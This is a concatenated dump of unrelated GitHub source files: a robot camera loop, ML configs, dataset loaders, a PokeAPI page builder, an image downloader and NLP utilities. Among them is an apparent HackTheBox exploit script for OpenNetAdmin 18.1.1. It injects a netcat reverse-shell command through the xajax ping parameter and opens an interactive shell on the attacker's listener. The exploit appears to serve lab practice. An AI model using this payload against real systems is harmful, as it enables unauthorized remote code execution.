visualise=True)\n\n print('Loaded Emotion Module...\\n')\n\n sensor_module = SensorModule(emotion_module)\n sensor_module.loadReactors()\n\n print('Loaded Sensor Module...\\n')\n\n # loading the camera should happen after sensor module is initialized but before loading camera for the sensor module\n front_camera = cv2.VideoCapture(FRONT_CAMERA)\n front_camera.set(cv2.CAP_PROP_FRAME_WIDTH, cameraMaxX)\n front_camera.set(cv2.CAP_PROP_FRAME_HEIGHT, cameraMaxY)\n\n back_camera = cv2.VideoCapture(BACK_CAMERA)\n back_camera.set(cv2.CAP_PROP_FRAME_WIDTH, cameraMaxX)\n back_camera.set(cv2.CAP_PROP_FRAME_HEIGHT, cameraMaxY)\n sensor_module.loadSensors(front_camera, back_camera)\n\n while self.running:\n\n sensor_module.update()\n\n if self.app is not None:\n # Process the app events to catch a click on Shutdown button\n self.app.processEvents()\n else:\n # Hit 'q' on the keyboard to quit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n self.running = False\n\n\n print(\"stopping...\")\n sensor_module.cleanup()\n if front_camera:\n front_camera.release()\n if back_camera:\n back_camera.release()\n cv2.destroyAllWindows()\n\n # Clear the current queue\n actionModule.clearQueue()\n\n if self.returnToZero:\n # Go to resting pose\n actionModule.goBackToZero()\n\n actionModule.stop()\n logging.info(str(time.time()) + ' ended.')\n\n def stop(self):\n self.running = False\n\n\nif __name__ == \"__main__\":\n noSetup = False\n noShutdown = False\n returnToZero = True\n if \"--noUI\" in sys.argv:\n noSetup = True\n noShutdown = True\n returnToZero = False\n\n app = QApplication(sys.argv)\n\n run = RunCatsCradle(returnToZero, app)\n appWidget = AppRun(run)\n\n launch = True\n if not noSetup:\n launch = appWidget.setup()\n\n if launch and not \"--noCameraCheck\" in sys.argv:\n launch = appWidget.checkCameras()\n\n if \"--dummyAction\" in sys.argv:\n launch = True\n\n if launch:\n appWidget.show()\n app.processEvents()\n run.run()\n\n if not noShutdown:\n appWidget.shutdown()\n","repo_name":"Kazjon/CatsCradle","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13013582228","text":"_base_ = [\n '../_base_/datasets/underwater_detection.py',\n '../_base_/default_runtime.py', '../_base_/schedules/schedule_1x.py'\n]\n# model settings\nmodel = dict(\n type='FCOS',\n pretrained='open-mmlab://detectron/resnet50_caffe',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n norm_cfg=dict(type='BN', requires_grad=False),\n norm_eval=True,\n style='caffe'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n start_level=1,\n add_extra_convs=True,\n extra_convs_on_inputs=False, # use P5\n num_outs=5,\n relu_before_extra_convs=True),\n bbox_head=dict(\n type='FCOSHead',\n num_classes=4,\n in_channels=256,\n stacked_convs=4,\n feat_channels=256,\n strides=[8, 16, 32, 64, 128],\n loss_cls=dict(\n type='FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n loss_bbox=dict(type='IoULoss', loss_weight=1.0),\n loss_centerness=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0)),\n # training and testing settings\n train_cfg=dict(\n assigner=dict(\n type='MaxIoUAssigner',\n pos_iou_thr=0.5,\n neg_iou_thr=0.4,\n min_pos_iou=0,\n ignore_iof_thr=-1),\n allowed_border=-1,\n pos_weight=-1,\n debug=False),\n test_cfg=dict(\n nms_pre=1000,\n min_bbox_size=0,\n score_thr=0.05,\n nms=dict(type='nms', iou_threshold=0.5),\n max_per_img=100))\n\n\"\"\"\noptimizer = dict(type='SGD', lr=0.00125, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=None)\n# learning policy\n# actual epoch = 3 * 3 = 9\n#lr_config = dict(policy='step', step=[3])\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=0.001,\n step=[8, 11])\n# runtime settings\n# total_epochs = 10 # actual epoch = 4 * 3 = 12\n# runtime settings\nrunner = dict(\n type='EpochBasedRunner', max_epochs=12) # actual epoch = 4 * 3 = 12\n\"\"\"\noptimizer = dict(type='SGD', lr=0.00125, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=None)\n# learning policy\n# actual epoch = 3 * 3 = 9\nlr_config = dict(policy='step', step=[3])\n# runtime settings\n# total_epochs = 10 # actual epoch = 4 * 3 = 12\n# runtime settings\nrunner = dict(\n type='EpochBasedRunner', max_epochs=10) # actual epoch = 4 * 3 = 12\n\n","repo_name":"iPriest001/my_mmdetection","sub_path":"configs/fcos/fcos_r50_underwater_caffe_fpn_gn-head_1x.py","file_name":"fcos_r50_underwater_caffe_fpn_gn-head_1x.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31033504946","text":"import textwrap\n\ndef src(proj_name, ver, desc, git_url, author, author_email, license_name):\n\n return textwrap.dedent(\n'''\n{{\n \"name\": \"{PROJECT_NAME}\",\n \"version\": \"{VERSION}\",\n \"description\": \"{DESCRIPTION}\",\n \"repository\": \"{GIT_REPOSITORY}\",\n \"author\": \"{AUTHOR_NAME} <{EMAIL}>\",\n \"license\": \"{LICENSE}\",\n \"private\": true,\n \"dependencies\": {{\n \"@angular/animations\": \"^5.2.0\",\n \"@angular/common\": \"^5.2.0\",\n \"@angular/compiler\": \"^5.2.0\",\n \"@angular/core\": \"^5.2.0\",\n \"@angular/forms\": \"^5.2.0\",\n \"@angular/http\": \"^5.2.0\",\n \"@angular/platform-browser\": \"^5.2.0\",\n \"@angular/platform-browser-dynamic\": \"^5.2.0\",\n \"@angular/router\": \"^5.2.0\",\n \"core-js\": \"^2.4.1\",\n \"rxjs\": \"^5.5.6\",\n \"zone.js\": \"^0.8.19\"\n }},\n \"scripts\": {{\n \"ng\": \"ng\",\n \"start\": \"ng serve\",\n \"build\": \"ng build --prod\",\n \"test\": \"ng test\",\n \"lint\": \"ng lint\",\n \"e2e\": \"ng e2e\"\n }},\n \"devDependencies\": {{\n \"@angular/cli\": \"1.6.8\",\n \"@angular/compiler-cli\": \"^5.2.0\",\n \"@angular/language-service\": \"^5.2.0\",\n \"@types/jasmine\": \"~2.8.3\",\n \"@types/jasminewd2\": \"~2.0.2\",\n \"@types/node\": \"~6.0.60\",\n \"codelyzer\": \"^4.0.1\",\n \"jasmine-core\": \"~2.8.0\",\n \"jasmine-spec-reporter\": \"~4.2.1\",\n \"karma\": \"~2.0.0\",\n \"karma-chrome-launcher\": \"~2.2.0\",\n \"karma-coverage-istanbul-reporter\": \"^1.2.1\",\n \"karma-jasmine\": \"~1.1.0\",\n \"karma-jasmine-html-reporter\": \"^0.2.2\",\n \"protractor\": \"~5.1.2\",\n \"ts-node\": \"~4.1.0\",\n \"tslint\": \"~5.9.1\",\n \"typescript\": \"~2.5.3\"\n }}\n}}\n''').format(\n PROJECT_NAME = proj_name,\n VERSION = ver,\n DESCRIPTION = desc,\n GIT_REPOSITORY = git_url,\n AUTHOR_NAME = author,\n EMAIL = author_email,\n LICENSE = license_name\n ).strip()\n","repo_name":"shotastage/mirage-django","sub_path":"console/template/package_json_angular.py","file_name":"package_json_angular.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38609790332","text":"import os\nimport os.path as osp\nimport shutil\nfrom glob import glob\n\nfrom tqdm import tqdm\n\nimport torch\nfrom torch_geometric.data import Dataset, Data, InMemoryDataset\nimport numpy as np\nimport math\n\nclass ModelNetSdfSphereRotate(InMemoryDataset):\n def __init__(self, root, transform = None, pre_transform = None):\n self.root = root\n self.read_func = self.read_graph\n\n super(ModelNetSdfSphereRotate, self).__init__(root, transform, pre_transform)\n\n self.train_dataset = torch.load(self.processed_paths[0])\n self.test_dataset = torch.load(self.processed_paths[1])\n\n \n\n def process(self):\n files = []\n datas = []\n self.label_name = []\n graph_type = 0\n folders = [f.path for f in os.scandir(self.root) if f.is_dir()]\n for folder in folders:\n folder_name = folder.split(\"/\")[-1]\n if(folder_name == \"processed\"):\n continue\n self.label_name.append(folder_name)\n files = glob(osp.join(folder, \"train\", \"*.txt\"))\n for file in tqdm(files):\n data = self.read_func(file, graph_type)\n datas.append(data)\n graph_type += 1\n self.train_dataset = datas\n\n datas2 = []\n graph_type2 = 0\n for folder in folders:\n folder_name = folder.split(\"/\")[-1]\n if(folder_name == \"processed\"):\n continue\n files = glob(osp.join(folder, \"test\", \"*.txt\"))\n for file in tqdm(files):\n data = self.read_func(file, graph_type2)\n datas2.append(data)\n graph_type2 += 1\n self.test_dataset = datas2\n\n torch.save(self.train_dataset, self.processed_paths[0])\n torch.save(self.test_dataset, self.processed_paths[1])\n\n\n @property\n def raw_file_names(self):\n return []\n\n @property\n def processed_file_names(self):\n return ['train_rotate.pt', 'test_rotate.pt']\n\n\n\n def read_graph(self, path, graph_type):\n f = open(path)\n x = []\n y = torch.tensor([graph_type], dtype=torch.long)\n edge_index = [[], []]\n edge_attr = []\n nodeNum = (int)(f.readline())\n for i in range(nodeNum):\n line = f.readline()\n x.append([float(x) for x in line.split()])\n \n \n\n linkNum = (int)(f.readline())\n links = []\n for i in range(linkNum):\n line = f.readline()\n _x, _y, _len = line.split()\n links.append([_x, _y, _len])\n edge_index[0].append((int)(_x))\n edge_index[1].append((int)(_y))\n edge_index[0].append((int)(_y))\n edge_index[1].append((int)(_x))\n edge_attr.append([float(_len)])\n edge_attr.append([float(_len)])\n \n x = np.array(x)\n x[np.isnan(x)] = 0\n xM = x.max(axis=0)\n xm = x.min(axis=0)\n x_m = np.where(-xm>xM, -xm, xM)\n x_m[x_m == 0] = 1\n x_m[0] = 1\n x_m[1] = 1\n x /= x_m\n\n x = torch.tensor(x, dtype = torch.float)\n edge_index = torch.tensor(edge_index, dtype = torch.long)\n edge_attr = torch.tensor(edge_attr, dtype = torch.float)\n data = Data(x = x, edge_index = edge_index, edge_attr = edge_attr, y = y)\n return data","repo_name":"cscvlab/SN-Graph","sub_path":"SN-Graph Network/ModelNet40sdfsphRotate.py","file_name":"ModelNet40sdfsphRotate.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"94"} +{"seq_id":"37070295397","text":"import poke_validation as pv\nfrom get_module import get_info\nfrom poke_comentarios import obtener_comentarios\nfrom poke_span import genera_span\nfrom string import Template\nfrom show import show_pics\n\n\nname = input('Ingrese el nombre del pokemon a buscar\\n(Nota: Si el pokémon tiene espacios reemplace por \"-\".\\nNo '\n 'coloque ningún tipo de signo de puntuación adicional. \\nEjemplo: Mr. Mime, se debe ingresar como '\n 'mr-mime o Mr-Mime): ')\nname = pv.validate(name)\nurl_base = f'https://pokeapi.co/api/v2/pokemon/{name}'\ndata_base = get_info(url_base)\nname = name.capitalize()\npoke_n = data_base[\"id\"]\nstats = data_base[\"stats\"]\n\nindicadores = []\nfor item in stats:\n indicadores.append(item[\"base_stat\"])\n\n\npoke_hp, poke_at, poke_de, poke_ate, poke_dee, poke_ve = indicadores\n\n# imagen (url)\npoke_img = data_base['sprites']['front_default']\n\n# etapa previa\nurl_previa = f\"https://pokeapi.co/api/v2/pokemon-species/{poke_n}\"\ndata_etapa_previa = get_info(url_previa)\n\npoke_etapa_previa = data_etapa_previa['evolves_from_species']\nif poke_etapa_previa is not None:\n poke_etapa_previa = poke_etapa_previa['name'].capitalize()\nelse:\n poke_etapa_previa = \"\"\nif poke_etapa_previa != \"\":\n poke_etapa_previa = f\"Etapa Previa: {poke_etapa_previa}\"\n\n# tipos\ntipos_lista = data_base[\"types\"]\n\ntipos = []\nfor item in tipos_lista:\n tipos.append(item[\"type\"][\"name\"])\n\n\n# descripción\npoke_comentario = obtener_comentarios(poke_n)\n\n# span tipos\nspan_tipo = f\"{genera_span(tipos)}\"\n\n# fortalezas y debilidades\nurl_damage = [item[\"type\"][\"url\"] for item in tipos_lista]\n\n# indicadores de combate\nurl_damage = []\nfor item in tipos_lista:\n url_damage.append(item[\"type\"][\"url\"])\n\nif len(url_damage) == 1:\n data_rel1 = get_info(url_damage[0])\n\nelse:\n data_rel1 = get_info(url_damage[0])\n data_rel2 = get_info(url_damage[1])\n\n# super eficaz contra\nif len(url_damage) == 1:\n supef_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"]\nelse:\n supef_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"] + data_rel2[\"damage_relations\"][\"double_damage_to\"]\n\n\nsupef_co = [item[\"name\"] for item in supef_contra]\nsupef_co = set(supef_co)\n\n\n# debil contra\nif len(url_damage) == 1:\n debil_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"]\nelse:\n debil_contra = data_rel1[\"damage_relations\"][\"double_damage_to\"] + data_rel2[\"damage_relations\"][\"double_damage_to\"]\n\ndeb_co = [item[\"name\"] for item in debil_contra]\ndeb_co = set(deb_co)\n\n\n# resistente contra\nif len(url_damage) == 1:\n resistente_contra = data_rel1[\"damage_relations\"][\"half_damage_from\"]\nelse:\n resistente_contra = data_rel1[\"damage_relations\"][\"half_damage_from\"] + data_rel2[\"damage_relations\"][\"half_damage_from\"]\n\nres_co = [item[\"name\"] for item in resistente_contra]\nres_co = set(res_co)\n\n\n# poco eficaz contra\nif len(url_damage) == 1:\n pocoeficaz_contra = data_rel1[\"damage_relations\"][\"half_damage_to\"]\nelse:\n pocoeficaz_contra = data_rel1[\"damage_relations\"][\"half_damage_to\"] + data_rel2[\"damage_relations\"][\"half_damage_to\"]\n\npoef_co = [item[\"name\"] for item in pocoeficaz_contra]\npoef_co = set(poef_co)\n\n\n# inmune contra\nif len(url_damage) == 1:\n inmune_contra = data_rel1[\"damage_relations\"][\"no_damage_from\"]\nelse:\n inmune_contra = data_rel1[\"damage_relations\"][\"no_damage_from\"] + data_rel2[\"damage_relations\"][\"no_damage_from\"]\n\ninm_co = [item[\"name\"] for item in inmune_contra]\ninm_co = set(inm_co)\n\n\n# ineficaz contra\nif len(url_damage) == 1:\n ineficaz_contra = data_rel1[\"damage_relations\"][\"no_damage_to\"]\nelse:\n ineficaz_contra = data_rel1[\"damage_relations\"][\"no_damage_to\"] + data_rel2[\"damage_relations\"][\"no_damage_to\"]\n\ninef_co = [item[\"name\"] for item in ineficaz_contra]\ninef_co = set(inef_co)\n\n\n# span indicadores\nspan_supef_co = genera_span(supef_co)\n\nspan_deb_co = genera_span(deb_co)\n\nspan_res_co = genera_span(res_co)\n\nspan_poef_co = genera_span(poef_co)\n\nspan_inm_co = genera_span(inm_co)\n\nspan_inef_co = genera_span(inef_co)\n\n\n# html de salida\nwith open('index.html', 'r', encoding='utf-8') as infile:\n entrada = infile.read()\n\ndocument_template = Template(entrada)\n\n\n# variables para html\nhtml = document_template.safe_substitute(\n poke_n = poke_n,\n poke_name = name,\n poke_etapa_previa = poke_etapa_previa,\n poke_hp = poke_hp,\n poke_at = poke_at,\n poke_de = poke_de,\n poke_ate = poke_ate,\n poke_dee = poke_dee,\n poke_ve = poke_ve,\n poke_img = poke_img,\n span_tipo = span_tipo,\n poke_comentario = poke_comentario,\n span_supef_co = span_supef_co,\n span_deb_co = span_deb_co,\n span_res_co = span_res_co,\n span_poef_co = span_poef_co,\n span_inm_co = span_inm_co,\n span_inef_co = span_inef_co)\n\n\nshow_pics(html, 'output')\n","repo_name":"RojaVictoria/Prueba-PokeAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41587432033","text":"import logging\nimport requests\nimport os\nimport threading\nimport datetime\n\ndef worker(url=None):\n download_gambar(url)\n print(\"Downloaded {}\\n\" . format(url))\n return\n\ndef download_gambar(url=None):\n if (url is None):\n return False\n ff = requests.get(url)\n tipe = dict()\n tipe['image/png']='png'\n tipe['image/jpg']='jpg'\n tipe['image/jpeg']='jpg'\n\n content_type = ff.headers['Content-Type']\n logging.warning(content_type)\n if (content_type in list(tipe.keys())):\n namafile = os.path.basename(url)\n namafile1 = namafile.split('?')\n ekstensi = tipe[content_type]\n logging.warning(f\"writing {namafile}.{ekstensi}\")\n fp = open(namafile1[0]+'.'+ekstensi,\"wb+\")\n fp.write(ff.content)\n fp.close()\n else:\n return False\n\n\n\n\nif __name__=='__main__':\n imgs = [\n 'https://images.unsplash.com/photo-1583142499515-db3e66a57bdc?ixlib=rb-1.2.1&auto=format&fit=crop&w=500&q=60',\n 'https://images.unsplash.com/photo-1520699894975-334692f3a636?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=500&q=60',\n 'https://images.unsplash.com/photo-1453904061941-02ada96e1f4a?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=500&q=60',\n ]\n threads = []\n for im in imgs:\n t = threading.Thread(target=download_gambar,args=(im,))\n threads.append(t)\n t.start()\n\n","repo_name":"rizaldihz/PROGJAR_05111740000024","sub_path":"Tugas3/client_3.py","file_name":"client_3.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11730982292","text":"import string\n# Example using nltk for data retrieval purpose\nimport nltk\nnltk.download('omw-1.4')\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer\n\ndef wnl(tokenizing_sentence):\n wnl = WordNetLemmatizer()\n new_sentence = []\n i = 0\n while(i\n\nimport argparse\nimport requests\nimport sys\nimport urllib\nfrom pwn import *\n\ndef main():\n global proxies\n \n # args\n argparser = argparse.ArgumentParser(description='OpenNetAdmin 18.1.1 - Remote Code Execution',\n add_help=False)\n main_arg = argparser.add_argument_group(\"MAIN\")\n\n main_arg.add_argument('-h', '--help',\n help='Show this help menu',\n action='store_true')\n\n main_arg.add_argument('--url', type=str,\n help='Remote host to exploit',\n required=True)\n\n main_arg.add_argument('--lhost', type=str,\n help='Local host to receive the reverse shell',\n required=True)\n \n main_arg.add_argument('--lport', type=str,\n help='Local port to receive the reverse shell (default: 4444)',\n default='4444')\n \n main_arg.add_argument('--burpsuite', action='store_true',\n help='Enable BurpSuite\\'s proxy')\n\n args = argparser.parse_args()\n\n # arg validation\n if args.help:\n argparser.print_help()\n sys.exit(1)\n\n # cons\n url = args.url\n lhost = args.lhost\n lport = args.lport\n burpsuite = args.burpsuite\n\n # proxies\n proxies = { \"http\": \"http://127.0.0.1:8080\" }\n\n def reverse_shell(l):\n l.sendline('python3 -c \"import pty;pty.spawn(\\'/bin/bash\\')\"')\n l.interactive()\n\n def exploit():\n global proxies\n\n payload = \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} > /tmp/f\".format(lhost, lport)\n \n params = {\n \"xajax\": \"window_submit\",\n \"xajaxr\": \"1574117726710\",\n \"xajaxargs[]\": [\"tooltips\", 'ip=>;{}'.format(payload), 'ping']\n }\n\n l = listen(lport)\n l1 = log.progress(\"Exploiting the OpenNetAdmin web application\")\n\n if burpsuite:\n try:\n r = requests.post(url, data=params, proxies=proxies, timeout=5)\n except:\n l1.success(\"Success!\")\n log.info(\"Spawning the interactive shell\")\n reverse_shell(l)\n\n else:\n try:\n r = requests.post(url, data=params, timeout=5)\n \n except:\n l1.success(\"Success!\")\n log.info(\"Spawning the interactive shell\")\n reverse_shell(l)\n\n # main\n log.info(\"OpenNetadmin 18.1.1 - Remote Code Execution\")\n log.info(\"Python script exploit author: nullarmor\")\n \n exploit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nullarmor/hackthebox-exploits","sub_path":"openadmin/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"94"} +{"seq_id":"14976800848","text":"import json\nimport os\nimport os.path as osp\nfrom functools import lru_cache, wraps\nfrom typing import *\n\nimport h5py\nimport networkx as nx\nimport numpy as np\nimport torch\nfrom rsmlkit.collections.frozendict import frozendict\nfrom rsmlkit.logging import get_logger\n\nlogger = get_logger('__file__')\n\ndef freezeargs(func):\n \"\"\"\n Transform mutable dictionnary\n Into immutable Useful to be compatible with cache\n \"\"\"\n @wraps(func)\n def wrapped(*args, **kwargs):\n args = tuple([frozendict(arg) if isinstance(arg, dict) else arg for arg in args])\n kwargs = {k: frozendict(v) if isinstance(v, dict) else v for k, v in kwargs.items()}\n return func(*args, **kwargs)\n return wrapped\n\n\ndef mkdirs(paths):\n try:\n if isinstance(paths, list):\n for path in paths:\n if not os.path.exists(path):\n os.makedirs(path)\n else:\n if not os.path.exists(paths):\n os.makedirs(paths)\n except FileExistsError as fe:\n logger.error(fe)\n\n@freezeargs\n@lru_cache(maxsize=128)\ndef invert_dict(d):\n return {v: k for k, v in d.items()}\n\n\n@lru_cache(maxsize=16)\ndef load_vocab(path):\n with open(path) as f:\n vocab = json.load(f)\n vocab['question_idx_to_token'] = invert_dict(vocab['question_token_to_idx'])\n vocab['program_idx_to_token'] = invert_dict(vocab['program_token_to_idx'])\n vocab['answer_idx_to_token'] = invert_dict(vocab['answer_token_to_idx'])\n # Sanity check: make sure , , and are consistent\n assert vocab['question_token_to_idx'][''] == 0\n assert vocab['question_token_to_idx'][''] == 1\n assert vocab['question_token_to_idx'][''] == 2\n assert vocab['program_token_to_idx'][''] == 0\n assert vocab['program_token_to_idx'][''] == 1\n assert vocab['program_token_to_idx'][''] == 2\n return vocab\n\n\ndef load_scenes(scenes_json):\n scenes = []\n if scenes_json is None:\n print(\"No scenes_json file specified, returning empty scenes\")\n return scenes\n with open(scenes_json) as f:\n scenes_dict = json.load(f)['scenes']\n for s in scenes_dict:\n table = []\n for i, o in enumerate(s['objects']):\n item = {'id': '%d-%d' % (s['image_index'], i)}\n if '3d_coords' in o:\n item['position'] = [np.dot(o['3d_coords'], s['directions']['right']),\n np.dot(o['3d_coords'], s['directions']['front']),\n o['3d_coords'][2]]\n else:\n item['position'] = o['position']\n item['color'] = o['color']\n item['material'] = o['material']\n item['shape'] = o['shape']\n item['size'] = o['size']\n table.append(item)\n scenes.append(table)\n return scenes\n \n\ndef load_embedding(path):\n return torch.Tensor(np.load(path))\n\ndef load_data_from_h5(question_h5_path):\n question_h5 = h5py.File(question_h5_path, 'r')\n questions = torch.LongTensor(np.asarray(question_h5['questions'], dtype=np.int64))\n image_idxs = np.asarray(question_h5['image_idxs'], dtype=np.int64)\n orig_idxs = np.asarray(question_h5['orig_idxs'], dtype=np.int64)\n programs, answers = None, None\n if 'programs' in question_h5:\n programs = torch.LongTensor(np.asarray(question_h5['programs'], dtype=np.int64))\n if 'answers' in question_h5:\n answers = np.asarray(question_h5['answers'], dtype=np.int64)\n if 'question_families' in question_h5:\n question_families = np.asarray(question_h5['question_families'], dtype=np.int64)\n\n return questions, programs, answers, image_idxs, orig_idxs, question_families\n\ndef load_mgn_graph_data(question_h5_path):\n print(f\"Getting graph data from question_h5_path: {question_h5_path}\")\n fdir = osp.dirname(question_h5_path)\n fnp = osp.basename(question_h5_path).split('.')[0]\n print(f\"fnp = {fnp}\")\n load_Gs_fn = lambda x: nx.read_gpickle(f\"{fdir}/{fnp}_{x}.gpickle\")\n graphs = ['Gss', 'Gts', 'Gus', 'Gus_matched']\n loaded_Gs = []\n for gn in graphs:\n loaded_Gs.append(load_Gs_fn(gn))\n print(f\"Number of Graphs loaded = {len(loaded_Gs)}\")\n assert len(loaded_Gs[0]) == len(loaded_Gs[1])\n assert len(loaded_Gs[1]) == len(loaded_Gs[3])\n\n # Load G embeddings ( {fnp}_G_embds.npz )\n embds_fp = f\"{fdir}/{fnp}_G_embds.npz\"\n print(f\"Loading Graph embeddings from: {embds_fp} \")\n G_embds = np.load(embds_fp, allow_pickle=True)\n\n # load_G_embds_fn = lambda x: G_embds[x]\n def load_G_embds_fn(G_embds, x):\n # Convert ndArray to Tensor here\n return G_embds[x]\n\n loaded_embds = []\n for embd in ['Gs_embds', 'Gt_embds', 'Gts_pos']:\n loaded_embds.append(load_G_embds_fn(G_embds, embd))\n\n # Load G edges ( {fnp}_edges.pt )\n edges_fp = f\"{fdir}/{fnp}_edges.pt\"\n print(f\"Loading Graph edges from: {edges_fp} \")\n G_edges = torch.load(edges_fp)\n load_G_edges_fn = lambda x: G_edges[x]\n loaded_edges = []\n for e in ['Ess', 'Ets', 'Eus_matched']:\n loaded_edges.append(load_G_edges_fn(e))\n\n return tuple(loaded_Gs), tuple(loaded_embds), tuple(loaded_edges)\n\n# mgn.reason.run_test\ndef find_clevr_question_type(out_mod):\n \"\"\"Find CLEVR question type according to program modules\"\"\"\n if out_mod == 'count':\n q_type = 'count'\n elif out_mod == 'exist':\n q_type = 'exist'\n elif out_mod in ['equal_integer', 'greater_than', 'less_than']:\n q_type = 'compare_num'\n elif out_mod in ['equal_size', 'equal_color', 'equal_material', 'equal_shape']:\n q_type = 'compare_attr'\n elif out_mod.startswith('query'):\n q_type = 'query'\n return q_type\n\ndef get_prog_from_seq(pseq: List, vocab:dict) -> str:\n i2t = vocab.get('program_idx_to_token')\n t2i = vocab.get('program_token_to_idx')\n if not i2t:\n logger.error(\"Invalid vocab: no program_idx_to_token\")\n return \"N/A\"\n if not t2i:\n logger.error(\"Invalid vocab: no program_idx_to_token\")\n return \"N/A\"\n _start_idx = t2i.get('')\n if not _start_idx:\n _start_idx = 1\n _end_idx = t2i.get('')\n if not _end_idx:\n _end_idx = 2\n pstr = []\n for pi in pseq:\n if pi == _end_idx: break;\n if pi == _start_idx: continue;\n pstr.append(i2t.get(pi))\n pstr = \"->\".join(pstr)\n logger.debug(f\"program seq: {pstr}\")\n return pstr\n\n## Analysis Helper Functions\ndef get_qtype_distribution_from_fp(fp, template=None):\n print(f\"question type distribution in {fp}:\")\n try:\n with open(fp) as f:\n all_questions = json.load(f)['questions']\n get_qtype_distribution_from_questions(all_questions)\n except FileNotFoundError as fne:\n print(fne)\n\ndef get_qtype_distribution_from_h5(fp, vocab_path):\n print(f\"question type distribution in {fp}:\")\n x, y, ans, idx, *_ = load_data_from_h5(fp)\n y = y.numpy()\n vocab = load_vocab(vocab_path)\n all_q_types = []\n c = Counter()\n for pg in y:\n pT = vocab['program_idx_to_token'][pg[1]]\n q_type = find_clevr_question_type(pT)\n all_q_types.append(q_type)\n c[q_type] += 1\n\n return c, all_q_types\n\ndef get_qtype_distribution_from_questions(all_questions) -> Tuple[Counter, List]:\n l = len(all_questions)\n # print(\"Num of questions %d\" % l)\n all_programs = list(map(lambda x: x['program'], all_questions))\n all_q_types = []\n c = Counter()\n for pg in all_programs:\n pT = pg[-1]['function']\n q_type = find_clevr_question_type(pT)\n all_q_types.append(q_type)\n c[q_type] += 1\n\n return c, all_q_types\n\n\n","repo_name":"raeidsaqur/mgn","sub_path":"mgn/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"94"} +{"seq_id":"29737207315","text":"# Use the program developed in Project 03-03 to implement high-boost filtering, \n# as given in Eq. (3.6-9). The averaging part of the process should be done using \n# the mask in Fig. 3.32(a).\n\nfrom PIL import Image, ImageDraw\n\ndef get_origin():\n\n\tfor i in range(width):\n\t\tfor j in range(height):\n\t\t\torigin_image[i][j] = data[i, j]\n\ndef enlarge_image(s, origin_image):\n\n\twidth = len(origin_image)\n\theight = len(origin_image[0])\n\tenlarged_width = 2 * s + width\n\tenlarged_height = 2 * s + height\n\tenlarged_image = [[255 for i in range(enlarged_height)] for j in range(enlarged_width)]\n\t\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\tenlarged_image[x + s][y + s] = origin_image[x][y]\n\n\tfor x in range(width):\n\t\tfor y in range(s):\n\t\t\tenlarged_image[x + s][y] = origin_image[x][y]\n\t\t\tenlarged_image[x + s][enlarged_height - y - 1] = origin_image[x][height - y - 1]\n\n\tfor x in range(s):\n\t\tfor y in range(height):\n\t\t\tenlarged_image[x][y + s] = origin_image[x][y]\n\t\t\tenlarged_image[enlarged_width - x - 1][y + s] = origin_image[width - x - 1][y]\n\n\tfor x in range(s):\n\t\tfor y in range(s):\n\t\t\tenlarged_image[x][y] = origin_image[x][y]\n\t\t\tenlarged_image[x][enlarged_height - y - 1] = origin_image[x][height - y - 1]\n\t\t\tenlarged_image[enlarged_width - x - 1][y] = origin_image[width - x - 1][y]\n\t\t\tenlarged_image[enlarged_width - x - 1][enlarged_height - y - 1] = origin_image[width - x - 1][height - y - 1]\n\n\treturn enlarged_image\n\ndef get_w(gaussian_mask_size):\n\tw = [0 for i in range(gaussian_mask_size * gaussian_mask_size)]\n\te = 2.71828\n\td = 5.0\n\tn = 0\n\tfor i in range(-2, 3):\n\t\tfor j in range(-2, 3):\n\t\t\tw[n] = e ** ( (-1) * (i * i + j * j) / (2 * d * d) )\n\t\t\tn += 1\n\n\treturn w\n\ndef count_gaussian_pixel(i, j, enlarged_image, gaussian_mask_size, w, sum):\n\tresult = 0.0\n\tmask_index = [ [0 for n in range(2)] for m in range(gaussian_mask_size * gaussian_mask_size)]\n\tstart = -1 * (gaussian_mask_size / 2)\n\tend = gaussian_mask_size / 2 + 1\n\tdis = gaussian_mask_size / 2\n\tn = 0\n\n\tfor x in range(start, end):\n\t\tfor y in range(start, end):\n\t\t\tmask_index[n][0] = i + x + dis\n\t\t\tmask_index[n][1] = j + y + dis\n\t\t\tn 